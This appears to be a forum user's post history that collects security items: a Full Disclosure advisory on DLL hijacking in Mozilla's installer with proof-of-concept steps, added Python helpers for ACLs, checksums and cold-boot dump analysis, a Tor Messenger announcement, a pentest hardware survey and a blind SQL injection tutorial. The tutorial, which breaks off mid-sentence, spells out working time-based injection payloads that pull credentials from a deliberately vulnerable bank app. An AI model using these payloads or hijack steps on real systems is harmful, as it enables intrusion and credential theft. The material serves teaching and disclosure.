Everything posted by Nytro
-
Arbitrary code execution resp. escalation of privilege with Mozilla's SETUP.EXE

From: "Stefan Kanthak" <stefan.kanthak () nexgo de>
Date: Wed, 28 Oct 2015 20:04:23 +0100

Hi @ll,

Mozilla's (executable) full setup packages for Windows allow arbitrary code execution resp. escalation of privilege: their SETUP.EXE loads SHFOLDER.DLL [¹] from a temporary (sub)directory "%TEMP%\7zS<hex>.tmp\" created during self-extraction of the full setup packages.

This vulnerability is well-known, every developer past absolute beginner should know about it: <https://capec.mitre.org/data/definitions/471.html>

See <https://bugzilla.mozilla.org/show_bug.cgi?id=792106> for all the trouble Mozilla's developers went through to fix this vulnerability in the 7zip self-extractor.
See <https://bugzilla.mozilla.org/show_bug.cgi?id=961676> for this vulnerability in their maintenance_installer.exe.

Proof of concept:
~~~~~~~~~~~~~~~~~

1. fetch any Mozilla full setup package (these are self-extracting archives built with 7zip), for example "Firefox Setup 38.3.0esr.exe" from <https://www.mozilla.org/en-US/firefox/organizations/all/>

2. extract this full setup package into an arbitrary directory, for example "%TEMP%\7zSxyz.tmp", using (again for example)
   7za.exe x -o"%TEMP%\7zSxyz.tmp" "Firefox Setup 38.3.0esr.exe"

3. fetch <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html>) and save it as "%TEMP%\7zSxyz.tmp\shfolder.dll"

4. start "%TEMP%\7zSxyz.tmp\setup.exe" per double-click: the installer detection of Windows user account control (see <https://technet.microsoft.com/en-us/library/dd835540.aspx#BKMK_InstDet>) will chime in and prompt for consent resp. for an administrator password, then "%TEMP%\7zSxyz.tmp\setup.exe" loads "%TEMP%\7zSxyz.tmp\shfolder.dll" which displays a message box

Mitigation(s):
~~~~~~~~~~~~~~

0. DON'T USE EXECUTABLE INSTALLERS [²]!
   If your favourite applications are not distributed in the native installer package format of the resp. target OS: ask^WURGE their vendors/developers to provide native installation packages. If they don't: dump these applications, stay away from such software!

1. Turn off privilege elevation for standard users and installer detection for all users:

   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
   "ConsentPromptBehaviorUser"=dword:00000000
   ; Automatically deny elevation requests
   "EnableInstallerDetection"=dword:00000000

   See <https://technet.microsoft.com/en-us/library/dd835564.aspx>

2. deny execution in all "%TEMP%" directories and their subdirectories:
   * add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories" (use CACLS.EXE /SDDL for example);
   * use "software restriction policies" resp. AppLocker.

stay tuned
Stefan Kanthak

PS: Mozilla sits on this unfixed vulnerability for about 30 months: see <https://bugzilla.mozilla.org/show_bug.cgi?id=861012>

[¹] SHFOLDER.DLL is cruft from the last millennium, it was used on Windows 9x without Internet Explorer 4; see <https://support.microsoft.com/en-us/kb/241733>
    DONT USE the code shown in this MSKB article! See <https://msdn.microsoft.com/en-us/library/ff919712.aspx>, <https://msdn.microsoft.com/en-us/library/ms682586.aspx> and <https://technet.microsoft.com/en-us/library/2269637.aspx>

[²] self-extracting archives and executable installers are flawed^W insanely stupid in concept and dangerous in practice. DON'T USE SUCH CRUFT! ALWAYS use the resp. platform's native package and archive format. For Windows these are .INF (plus .CAB) and .MSI (plus .CAB), introduced 20 years ago (with Windows 95 and Windows NT4) resp. 16 years ago (with Office 2000).
    Both .INF and .MSI are "opened" by programs residing in %SystemRoot%\System32\ which are therefore immune to this kind of "DLL (and EXE) Search Order Hijacking" attack. Since both .INF and .MSI can access the contents of .CAB directly they eliminate the attack vector "unsafe temporary directory" too.

See <http://home.arcor.de/skanthak/temp/FIREFOX.INF> and <http://home.arcor.de/skanthak/temp/FIREFOX.DDF> as example of a native installer package for "Firefox 38.3.0 ESR (x86 de)":

1.a. create FIREFOX.CAB from the unpacked full setup package (see above; I used the german language version): run the command line
     MAKECAB.EXE /D SourceDir="%TEMP%\7zS<hex>.tmp\core" /F FIREFOX.DDF

1.b. create FIREFOX.CAB from the copy installed on your system: run the command line
     MAKECAB.EXE /D SourceDir="%ProgramFiles%\Mozilla Firefox" /F FIREFOX.DDF

2. install Firefox from FIREFOX.CAB: right-click FIREFOX.INF and then click "Install", or run the command line
   InfDefaultInstall.Exe "<path>\FIREFOX.INF"
   resp.
   RunDll32.Exe SetupAPI.Dll,InstallHinfSection DefaultInstall 132 <path>\FIREFOX.INF

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Source: http://seclists.org/fulldisclosure/2015/Oct/109
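Mitigation 2 of the mail expresses the deny-execute rule as an SDDL ACE, "(D;OIIO;WP;;;WD)", which is compact but hard to read. The decoder below is an added example and not part of the original mail; it splits an ACE string into its six fields and translates the abbreviations. The tables are deliberately small (the tokens used on this page plus a few common rights and well-known SIDs) and the reading of "WP" as the 0x20 bit, which on file-system objects is FILE_EXECUTE (FILE_TRAVERSE on directories), is an assumption that holds for NTFS ACLs, not for directory-service objects.

```python
# Added example: decode SDDL ACE strings such as "(D;OIIO;WP;;;WD)" (the mail's mitigation 2).
# The abbreviation tables are intentionally partial and cover file-system ACLs only.

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}

ACE_FLAGS = {
    "OI": "OBJECT_INHERIT",       # inherited by files (propagates down through subdirectories)
    "CI": "CONTAINER_INHERIT",    # inherited by subdirectories
    "IO": "INHERIT_ONLY",         # does not apply to the directory the ACE is set on
    "NP": "NO_PROPAGATE_INHERIT",
    "ID": "INHERITED",
}

# access-right abbreviation -> mask bits (file-system meaning; WP = 0x20 = FILE_EXECUTE)
ACCESS_RIGHTS = {
    "WP": 0x00000020,  # FILE_EXECUTE / FILE_TRAVERSE
    "FA": 0x001F01FF,  # FILE_ALL_ACCESS
    "FR": 0x00120089,  # FILE_GENERIC_READ
    "FW": 0x00120116,  # FILE_GENERIC_WRITE
    "FX": 0x001200A0,  # FILE_GENERIC_EXECUTE
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
}

WELL_KNOWN_SIDS = {
    "WD": ("S-1-1-0", "Everyone"),
    "AU": ("S-1-5-11", "Authenticated Users"),
    "SY": ("S-1-5-18", "Local System"),
    "BA": ("S-1-5-32-544", "Builtin Administrators"),
    "BU": ("S-1-5-32-545", "Builtin Users"),
}


def _split_pairs(field):
    # SDDL flag and right strings are concatenations of two-letter tokens ("OIIO" -> OI, IO)
    if len(field) % 2:
        raise ValueError("odd-length token list: %r" % field)
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def parse_ace(ace):
    """Return the ACE's type, inheritance flags, access mask and trustee as a dict."""
    ace = ace.strip()
    if not (ace.startswith("(") and ace.endswith(")")):
        raise ValueError("an ACE is enclosed in parentheses")
    parts = ace[1:-1].split(";")
    if len(parts) != 6:
        raise ValueError("expected 6 ';'-separated fields, got %d" % len(parts))
    ace_type, flags, rights, _object_guid, _inherit_guid, sid = parts
    if rights.lower().startswith("0x"):          # rights may also be a raw hex mask
        mask = int(rights, 16)
    else:
        mask = 0
        for token in _split_pairs(rights):
            mask |= ACCESS_RIGHTS[token]
    if sid.upper().startswith("S-"):             # literal SID instead of an abbreviation
        sid_value, trustee = sid, sid
    else:
        sid_value, trustee = WELL_KNOWN_SIDS[sid]
    return {
        "type": ACE_TYPES[ace_type],
        "flags": [ACE_FLAGS[t] for t in _split_pairs(flags)],
        "mask": mask,
        "sid": sid_value,
        "trustee": trustee,
    }


def describe_ace(ace):
    """One-line English reading of an ACE, in the terms the mail uses."""
    d = parse_ace(ace)
    verb = "deny" if d["type"] == "ACCESS_DENIED" else "allow"
    right = "execute" if d["mask"] == 0x20 else hex(d["mask"])
    scope = []
    if "OBJECT_INHERIT" in d["flags"]:
        scope.append("files in this directory and all subdirectories")
    if "CONTAINER_INHERIT" in d["flags"]:
        scope.append("subdirectories")
    where = " and ".join(scope) or "this object only"
    if "INHERIT_ONLY" in d["flags"]:
        where += " (not the directory itself)"
    return "%s %s for %s on %s" % (verb, right, d["trustee"], where)


if __name__ == "__main__":
    print(describe_ace("(D;OIIO;WP;;;WD)"))
```

Run stand-alone it prints the reading that matches the mail's wording: a deny of execute for Everyone, inherited by files below the directory but not applied to the directory itself. The same parser applied to an allow ACE such as "(A;;FA;;;BA)" yields the FILE_ALL_ACCESS mask for Builtin Administrators.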
-
Evaluating, Testing and Breaking Security Software

Breaking security software!!!

Slides here: https://www.dropbox.com/sh/h2o7y5s5ijl2awx/AAAdeR4DTiCU_izt_1RJhXVAa?dl=0
-
Tor Messenger Beta: Chat over Tor, Easily

Posted October 29th, 2015 by sukhbir

Today we are releasing a new, beta version of Tor Messenger, based on Instantbird, an instant messaging client developed in the Mozilla community.

What is it?

Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enables Off-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages.

What it isn't...

Tor Messenger builds on the networks you are familiar with, so that you can continue communicating in a way your contacts are willing and able to do. This has traditionally been in a client-server model, meaning that your metadata (specifically the relationships between contacts) can be logged by the server. However, your route to the server will be hidden because you are communicating over Tor. We are also excited about systems like Pond and Ricochet, which try to solve this problem, and would encourage you to look at their designs and use them too.

Why Instantbird?

We considered a number of messaging clients: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice -- its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users.

Current Status

Today we are releasing a beta version with which we hope to gain both usability and security related feedback. There have been three previous alpha releases to the mailing lists that have already helped smooth out some of the rougher edges.

Downloads

Linux (32-bit)
Linux (64-bit)
Windows
OS X
sha256sums.txt
sha256sums.txt.asc

The sha256sums.txt file containing hashes of the bundles is signed with the key 0x6887935AB297B391 (fingerprint: 3A0B 3D84 3708 9613 6B84 5E82 6887 935A B297 B391).

Instructions

On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop

On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.

On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory.

Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended.

Source Code

We are doing automated builds of Tor Messenger for all platforms. The Linux builds are reproducible: anyone who builds Tor Messenger for Linux should have byte-for-byte identical binaries compared with other builds from a given source. You can build it yourself and let us know if you encounter any problems or cannot match our build. The Windows and OS X builds are not completely reproducible yet but we are working on it.

What's to Come

Our current focus is security, robustness and user experience. We will be fixing bugs and releasing updates as appropriate, and in the future, we plan on pairing releases with Mozilla's Extended Support Release (ESR) cycle.

We have some ideas on where to take Tor Messenger but we would like to hear what you have to say. Some possibilities include:

- Reproducible builds for Windows and OS X
- Sandboxing
- Automatic updates
- Improved Tor support
- OTR over Twitter DMs
- Produce (and distribute) internationalized builds
- Secure multi-party communication (np1sec)
- Encrypted file-transfers
- Usability study

How To Help

Give it a try and provide feedback, requests, and file bugs (choose the "Tor Messenger" component). If you are a developer, help us close all our tickets or help us review our design doc. As always, we are idling on IRC in #tor-dev (OFTC) (nicks: arlolra; boklm; sukhe) and subscribed to the tor-talk/dev mailing lists.

Please note that this release is for users who would like to help us with testing the product but at the same time who also understand the risks involved in using beta software.

Thanks and we hope you enjoy Tor Messenger!

Source: https://blog.torproject.org/blog/tor-messenger-beta-chat-over-tor-easily
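The announcement ships a signed sha256sums.txt next to the bundles, which only helps if the downloader actually checks it. The script below is an added example, not Tor Project code: it parses the sha256sum file format, compares a bundle's digest against the entry for its file name, and checks that the long key ID quoted in the post is the tail of the quoted fingerprint (a v4 OpenPGP key ID is the last 16 hex digits of the 40-digit fingerprint). The bundle bytes, the sums file and the bundle file name are constructed for the example; real downloads are verified the same way after the signature has been checked with gpg.

```python
import hashlib

# Added example: verify a download against a sha256sums.txt entry and sanity-check the
# signing key's ID against its fingerprint. Sample data below is constructed, not real bundles.


def parse_sha256sums(text):
    """Parse sha256sum output: '<64 hex digits>  <filename>' per line ('*' marks binary mode)."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, name = line.partition("  ")
        if not sep or len(digest) != 64 or not name:
            raise ValueError("malformed sha256sums line: %r" % line)
        int(digest, 16)  # raises if the digest is not hex
        entries[name.lstrip("*")] = digest.lower()
    return entries


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def verify_bundle(name, data, sums_text):
    """Return (ok, detail): ok is True only when the file's digest matches its entry."""
    expected = parse_sha256sums(sums_text).get(name)
    if expected is None:
        return False, "no sha256sums entry for %s" % name
    actual = sha256_hex(data)
    return actual == expected, actual


def key_id_matches_fingerprint(key_id, fingerprint):
    """A long OpenPGP key ID is the last 16 hex digits of the v4 fingerprint."""
    fpr = fingerprint.replace(" ", "").upper()
    kid = key_id.upper()
    if kid.startswith("0X"):
        kid = kid[2:]
    return len(fpr) == 40 and len(kid) == 16 and fpr.endswith(kid)


# Constructed sample: fake bundle bytes and a sums file derived from them (constructed name).
SAMPLE_NAME = "tor-messenger-linux64-example.tar.xz"
SAMPLE_BUNDLE = b"constructed stand-in for a bundle, not a real archive\n"
SAMPLE_SUMS = "%s  %s\n%s  *%s\n" % (
    sha256_hex(SAMPLE_BUNDLE), SAMPLE_NAME,
    sha256_hex(b"another constructed file"), "tor-messenger-other-example.tar.xz",
)

# Key data as quoted in the post.
POST_KEY_ID = "0x6887935AB297B391"
POST_FINGERPRINT = "3A0B 3D84 3708 9613 6B84 5E82 6887 935A B297 B391"

if __name__ == "__main__":
    print("key id consistent with fingerprint:",
          key_id_matches_fingerprint(POST_KEY_ID, POST_FINGERPRINT))
    print("bundle ok:", verify_bundle(SAMPLE_NAME, SAMPLE_BUNDLE, SAMPLE_SUMS)[0])
    print("tampered ok:", verify_bundle(SAMPLE_NAME, SAMPLE_BUNDLE + b"x", SAMPLE_SUMS)[0])
```

The order matters: first confirm the detached signature with `gpg --verify sha256sums.txt.asc sha256sums.txt` using the imported key, and only then trust the digests inside the file; a hash list that has not been signature-checked protects against a corrupted download but not against a swapped one.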
-
Hardware assisted penetration testing

Penetration testing or pentesting is the practice of attacking your own or your clients’ IT systems in the same way a hacker would to identify security holes. Prior to starting with the penetration testing you normally need to clearly define the scope and get a written consent from the client, in other words you need a pre-engagement contract signed by your client. Depending on the information in your possession it could be a white-box or a black-box pentest. You’ll also need to follow a standard methodology while conducting the test in order to ensure quality, reproducibility and comparability of your pentest. I’m not going to talk about this now but I plan to write a series of articles on this matter in the future.

Every ethical hacker or penetration tester uses a variety of software in order to accomplish various tasks, some are well known frameworks for vulnerability assessment like Nexpose, Nessus and OpenVAS (just to name a few) or exploitation frameworks like Metasploit, CoreImpact Pro and Immunity Canvas, together with in-house tools. Obviously any software needs a personal computer, a server or a Cloud instance to run. Apart from this, there is a variety of other small devices and appliances that can assist a penetration tester during his job and today I’m going to talk right about this.

HARDWARE KEYLOGGERS

Hardware keyloggers are used for keystroke logging, a method of capturing and recording computer users’ keystrokes, including sensitive information like passwords and credit card numbers. They can be implemented via BIOS-level firmware, or alternatively, via a device plugged inline between a computer keyboard and a computer. They usually are made of a microcontroller, a flash memory and a USB or PS/2 connector.

[Images: USB KEYLOGGER; PS/2 KEYLOGGER; KeySweeper Wireless Keyboard Sniffer; COVERT KEYLOGGER KEYBOARD; HARDWARE VIDEO LOGGER (FRAME GRABBER)]

SIGINT AND TEMPEST SYSTEMS

SIGINT (SIGnals INTelligence) is intelligence derived from electronic signals and systems used by foreign targets, such as communications systems, radars, and weapons systems. SIGINT provides a vital window for our nation into foreign adversaries’ capabilities, actions, and intentions.

TEMPEST is a National Security Agency specification and NATO certification referring to spying on information systems through leaking emanations, including unintentional radio or electrical signals, sounds, and vibrations. TEMPEST covers both methods to spy upon others and also how to shield equipment against such spying. The protection efforts are also known as emission security (EMSEC), which is a subset of communications security (COMSEC). For more information about TEMPEST see here: The Complete, Unofficial TEMPEST Information Page.

[Images/videos: TEMPEST ATTACK; Van Eck Phreaking demonstration]

Another interesting demonstration was given in a 2009 BlackHat talk entitled “Sniffing Keystrokes With Lasers/Voltmeters – Side Channel Attacks Using Optical Sampling Of Mechanical Energy And Power Line Leakage” by Andrea Barisani and Daniele Bianco of Inverse Path Ltd.
https://www.blackhat.com/presentations/bh-usa-09/BARISANI/BHUSA09-Barisani-Keystrokes-SLIDES.pdf

WiFi HACKING DEVICES

Devices usually made of a router with an antenna capable of packet injection and a custom firmware usually based on a linux distro with hacking tools installed (aircrack-ng and others). An example of such device is WiFi Pineapple:

[Image: WIFI PINEAPPLE]

The WiFi Pineapple Mark V is the latest generation wireless network auditing tool from Hak5. With its custom, purpose built hardware and software, the WiFi Pineapple enables users to quickly and easily deploy advanced attacks using our intuitive web interface. From a man-in-the-middle hot-spot honeypot to an out-of-band pentest pivot box, the WiFi Pineapple is unmatched in performance, value and versatility.

Another example of WiFi cracking device is Reaver Pro:

[Image: REAVER PRO™ II]

Reaver Pro is able to crack a WEP password in only a few minutes, also WPA cracking is fast in case WPS is enabled.

PENTEST BOXES

MiniPwner – made up of a portable TP-Link MR3040 running OpenWrt

[Image: MINI PWNER]

Pwnie Express solutions:

[Images: PWN PLUG R3; PWN PRO; PWN PHONE; PWN PAD]

#r00tabaga is thinner than the MiniPwner, smaller and lighter than the WiFi Pineapple, and has a built-in 2000mAh Li-ion battery

[Image: #R00TABAGA]

TrustedSec Attack Platform (TAP) – TAP will ensure that the system is always up-to-date with your latest patches and uses the PenTesters Framework (https://github.com/trustedsec/ptf) to automatically install all of your tools and keep them up-to-date. For hardware, it uses the Intel NUC series with a solid-state drive, 16 gigs of ram, wireless alfa attached for wireless assessments and a Verizon LTE card so you don’t have to worry about egress filtering if it isn’t available. TAP is used internally by TrustedSec and isn’t available for sale but the software is open source and can be found here: https://github.com/trustedsec/tap

[Image: TAP]

HID ATTACKS

A Human Interface Device is a device that can be plugged into the USB port of a computer and is recognized as a keyboard and automatically trusted and executed by the computer (unlike CDs/DVDs and normal USB drives that rely on the Autorun). It can be programmed in order to execute a payload (as keystrokes) that can do many things, even spawning a shell, dumping passwords and escalating privileges.

Teensy – a complete USB-based microcontroller development system, in a very small footprint, capable of implementing many types of projects. All programming is done via the USB port. No special programmer is needed, only a standard “Mini-B” USB cable and a PC or Macintosh with a USB port.

[Image: TEENSY]

There are some libraries available for Teensy, like PHUKD by IronGeek, SET, Kautilya and Peensy.

Bad USB – a concept of HID attack vector presented at Blackhat 2014 by Karsten Nohl.

USB RUBBER DUCKY – a HID attack tool by Hak5

[Image: RUBBER DUCKY]

MAKE YOUR OWN HACKER GADGET

All of us have heard about or used Hacker Gadgets like the WiFi Pineapple, Minipwner, Pwn Plug, R00tabaga etc. They are fantastic to use for demos, in social engineering tasks, explaining security implications in a fun way to non security professionals and in actual pentest task automation! But what does it take to build one? In this course, we will teach you how to build a Hacker Gadget (or Pentest Gadget if you prefer) for less than $50 from scratch. How much technical expertise do you need to follow this course? – if you’ve installed Linux and ever configured an Access Point, you will feel right at home! See the course on PentesterAcademy, a SecurityTube.net initiative.

BOOKS

Some useful books for creating your own hacker gadget:

Happy hacking!

Author: Fabio Baroni
Date: 2015-10-29 22:46:19
Source: http://www.pentest.guru/index.php/2015/10/29/hardware-assisted-penetration-testing/
-
What exactly do you want to change in the program? How complex is it?
-
nullcon Goa 2015: Cold Boot Attack on DDR2 and DDR3 RAM by Marko Schuba

Published on 17 Jun 2015

Cold boot attacks enable access to the volatile memory of computers which are in a running state or have just been disconnected from power. The attack makes use of the remanence effect of DRAM: data in memory is not immediately erased after loss of power – it is slowly disappearing. Even after a minute without refresh, data can be found in DRAM. The approach can for instance be used to recover hard disk encryption keys of a locked computer.

In the paper cold boot attacks on DDR2 and DDR3 RAM and their results are presented. While attacks on DDR2 have been demonstrated in the past, attacks on DDR3 have been less successful. The authors explain how they attacked DDR3 RAM of various types and manufacturers. While many PC mainboards overwrite DDR3 before they are powered off, this is not the case for the board of the ASUS Notebook P53E which was used in our experiments. As a result, memory content could be extracted with a measured bit error rate between 0.0007% and 0.07%. For one DDR3 type an attack without cooling was possible, even though the error rate in that case was high (around 80%).

Additional analyses of the experimental results revealed that error rates strongly depend on the address space of DRAM. For example, one DRAM type had clear 64 kB memory block boundaries: while some blocks had bit error rates of 6% or 3%, others had 0% error rate. Other DRAM types also showed different error rates for different areas. The effect is most likely related to the initial state of the respective DRAM type.

Thanks for watching this video and you can join us on various social networking sites.
Website: nullcon - International Security Conference 2016
Facebook: NULLCON
Twitter: nullcon (@nullcon) | Twitter
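The description's key measurement is the bit error rate between a known memory image and the dump read back after power loss, and its observation that the rate is not uniform but changes at 64 kB block boundaries. The following Python is an added example (not the authors' code or data) showing how such an analysis is computed: an overall bit error rate, a per-block profile at 64 kB granularity, and a split into clean and decayed blocks. The "reference" and "recovered" images are constructed in the script with a simple decay model (one flipped bit in every n bits per block) so the expected rates are exact; real dumps would be read from files instead.

```python
import random

# Added example: bit-error-rate analysis of a memory dump at the 64 kB block granularity
# described in the talk. All input data is constructed inside this script.

BLOCK_SIZE = 64 * 1024  # 64 kB, the block boundary observed for one DRAM type in the talk


def bit_error_rate(reference, recovered):
    """Fraction of bits that differ between the known image and the dump read after power loss."""
    if len(reference) != len(recovered):
        raise ValueError("images must have the same length")
    differing = sum(bin(a ^ b).count("1") for a, b in zip(reference, recovered))
    return differing / (8 * len(reference))


def per_block_error_rates(reference, recovered, block_size=BLOCK_SIZE):
    """Error rate per block, so address-dependent remanence shows up as a profile, not one number."""
    return [bit_error_rate(reference[off:off + block_size], recovered[off:off + block_size])
            for off in range(0, len(reference), block_size)]


def classify_blocks(rates, clean_threshold=0.001):
    """Index lists of blocks that survived essentially intact versus blocks that decayed."""
    return {"clean": [i for i, r in enumerate(rates) if r <= clean_threshold],
            "decayed": [i for i, r in enumerate(rates) if r > clean_threshold]}


def flip_every_nth_bit(data, n):
    """Constructed decay model: flip exactly one bit in every n bits (n == 0 means no decay)."""
    if n == 0:
        return bytes(data)
    out = bytearray(data)
    for bit in range(0, 8 * len(out), n):
        out[bit // 8] ^= 1 << (bit % 8)
    return bytes(out)


def constructed_images(seed=2015):
    """Three 64 kB blocks of pseudo-random 'reference' memory plus a 'recovered' copy in which
    block 0 decayed at 1 bit in 16, block 1 at 1 bit in 32 and block 2 not at all."""
    rng = random.Random(seed)
    blocks = [bytes(rng.getrandbits(8) for _ in range(BLOCK_SIZE)) for _ in range(3)]
    reference = b"".join(blocks)
    recovered = b"".join([flip_every_nth_bit(blocks[0], 16),
                          flip_every_nth_bit(blocks[1], 32),
                          flip_every_nth_bit(blocks[2], 0)])
    return reference, recovered


if __name__ == "__main__":
    ref, rec = constructed_images()
    rates = per_block_error_rates(ref, rec)
    for i, r in enumerate(rates):
        print("block %d at offset 0x%06x: bit error rate %.4f%%" % (i, i * BLOCK_SIZE, r * 100))
    print("overall bit error rate: %.4f%%" % (bit_error_rate(ref, rec) * 100))
    print(classify_blocks(rates))
```

With the constructed decay the per-block rates come out as 6.25%, 3.125% and 0%, the same shape as the 6%/3%/0% pattern the description reports, while the single overall figure (3.125%) hides that structure; this is why a per-block profile is the more useful output when deciding which regions of a dump are worth searching for keys.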
-
Yes, useful
-
Blind SQL Injection & BurpSuite - Like A Boss

Posted on April 22, 2011 · 0 Comments

SQL injection used to be a lot easier a few years ago when it was less known, web application security was less mature, and errors were often exposed. It's very easy to use a variety of methods to cause errors to display database names, table names, column names, and even row values... when errors are enabled. These days, the SQL injection flaws that I am finding are largely of the "blind" type. To take a rough guess, I'd estimate this to be the case at least 8 out of 10 times. That is fine because blind SQL injection is still relatively easy to exploit.... with SQL injection in general still being used to great success in the wild.

There are plenty of SQL Injection tools out there that will work with blind or error-based vulnerabilities. Many of these are installed and ready to run on the BackTrack 4 R2. SQLMap is a good one but there are a lot and your success will vary. These tools can do more than just extract database data. They can get you root. Sometimes this just isn't in the cards for a variety of reasons and you just want to show proof of concept that you can pull back sensitive data through the web server. I love Burp's Intruder tool for this. I'll demonstrate some techniques below and use HacmeBank as a target even though errors are completely visible in this purposefully vulnerable app and blind techniques are not necessary.

The first thing we do is identify the vulnerable request:

We can send this request to the Repeater tool and inject the SQL syntax, " ' waitfor delay '0:0:30'-- " (omit the double quotes). The vulnerable web application will pass this SQL command directly to the login query causing a 30-second pause.

That's all just great but we want to do better than just pause the database during our login query. Let's set the HTTP timeout length from 60 seconds to 29 seconds in Burp's timeout options.

Ok, now we'll send our delay injection request over to the Intruder tool. This time the SQL syntax, " 'if (len(user)=1) waitfor delay '00:00:30'-- ." It's also necessary to now mark our payload position in Intruder. Put it where the "1" is.

Now that the payload position is marked, we need to define the payload. The SQL question is "How long is the USER variable?" Using a numeric payload, we'll guess 1 through 30, a wide margin indeed. One more thing to do is to set the Intruder threads to 1, otherwise when one thread delays the SQL database, the others will be delayed as well and false positives will abound.

Now we should get the length of the "USER" variable in the SQL server when this Intruder attack is started. When the correct payload number is guessed, the application will pause for 30 seconds, expiring our 29-second Burp timeout value.

At this point a good thing to know is what those 3 characters are that comprise the "USER" variable's length. Just open another Intruder tab and we'll change the attack quite a bit. This time the SQL syntax will be " ' if (ascii(lower(substring((user),1,1)))=100) waitfor delay '00:00:30'-- " and there are actually two changing payloads (highlighted in bold). One is the position of the character and the second is the ASCII decimal code of the character in that position.

The first payload needs to be numeric and range from 1 to 3 since we know that's the number of the character positions whose ASCII codes we want to guess.

For the next payload, we look up our ASCII codes and ponder a bit. 48-126 will get us 0-9, A-Z, and a-z. In our SQL syntax above, you'll notice that we're using the "lower()" function to reduce the number of ASCII code values to guess but our number range will include them anyway so we're not saving any time there. Since we're asking for a username, I doubt there are any special characters (32-47) in it so we'll just be lazy and use 48-126.

Running this attack should yield the three ASCII codes for the SQL "USER" variable. Sorting the results by length will put all of the 0-length, timed out, "true," responses in line.

Reading the timed out (true) values:
Payload 1 value 1 = payload 2 value 100 which is "d"
Payload 1 value 2 = payload 2 value 98 which is "b"
Payload 1 value 3 = payload 2 value 111 which is "o"

Dbo, a good proof of concept but we could have guessed it. Now let's go after some data. How about the SQL syntax, " ' if (ascii(lower(substring((select top 1 name from sysobjects where xtype=char(85) and name like '%user%'),1,1)))=100) waitfor delay '00:00:30'-- ?" This looks for a table that has the word "user" anywhere within. I'm not trying to be sneaky, and blind SQL injection is inherently not sneaky, so I'm just going to guess the length and set the first payload to 1 through 10. Hopefully the table is 10 characters or less in length. I'll keep the second payload at 48-126 (0-9, A-Z, a-z).

Running this attack should produce the ASCII codes for the first table that contains the word "user." That looks like 102=f, 115=s, 98=b, 95=_, 117=u, 115=s, 101=e, 114=r, 115=s (fsb_users).

Right on, so now we want the column names for this "fsb_users" table. For that we need to query the native Microsoft SQL "information_schema.columns" table. To do that, we'll use the following SQL syntax: " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users'),1,1)))=100) waitfor delay '00:00:30'-- ." Again we'll use two payloads, one for character position and the other for ASCII decimal code.

Running this attack will enumerate the first column in the "fsb_users" table. That spells "user_id" which is not very important to me but it does mean that the syntax for the next column in the "fsb_users" table will be, " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name>'user_id'),1,1)))=100) waitfor delay '00:00:30'-- ."

Running this attack yields the second column name of the "fsb_users" table. That's better because this looks like a column name for which I would be interested in row values. The "user_name" table can be used again, iteratively, to retrieve the third column using the following syntax, " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name > 'user_name'),1,1)))=100) waitfor delay '00:00:30'-- "

However, let's take a leap of faith and guess at the password column using the "like" operative: " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name like '%pass%'),1,1)))=100) waitfor delay '00:00:30'-- "

Running this will give us the name of the first column in the "fsb_users" table that contains the string, "pass." So now we have the predictable, "password" column which we can pair with the "user_name" column to start pulling some rows out. The SQL syntax will be, " ' if (ascii(substring((select top 1 user_name from fsb_users),1,1))=100) waitfor delay '00:00:30'-- ." I took the "lower()" function out just in case the usernames are case-sensitive in the login function. I want to make sure we account for enough characters that might comprise the first user_name value so I'll bump payload 1 up to the range, 1 - 15. We'll leave the second payload the same as before.

Running this attack should output the first "user_name" value in the "fsb_users" table. So the first "user_name" is "Jake_Reynolds." The next query will target this user's password. The SQL syntax is, " ' if (ascii(substring((select top 1 password from fsb_users where user_name = 'Jake_Reynolds'),1,1))=100) waitfor delay '00:00:30'-- ." The payload settings can be left alone assuming the user's password is 15 characters or less in length.

Running this attack should reveal the password for the user, "Jake_Reynolds." Any web application worth its salt is going to hash the password columns and use salt so that collision attacks are difficult. HacmeBank contains an unhashed database column. The following screenshot illustrates why you should make sure and encrypt or hash your password columns:

"Jake_Reynolds/P@55w0rd" it is then. Let's test it out of course. Works for me.

Let's take it a little further though. I have run up against web applications that filter for various SQL syntax like "select" and other basic SQL key words whilst still using vulnerable dynamic SQL statements on the back end. I've always maintained that input validation is not a very effective means of preventing SQL injection and that real remediation means changing your database access layer to use parameterized/precompiled queries. One way I've bypassed input filters that look for common words like "if" and "select" is to create a variable, cast it as hex, and execute it. Take the following SQL syntax for instance:

